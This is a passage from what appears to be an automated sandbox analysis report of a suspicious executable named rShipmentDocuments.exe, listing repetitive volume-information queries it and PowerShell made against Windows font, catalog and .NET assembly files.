                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
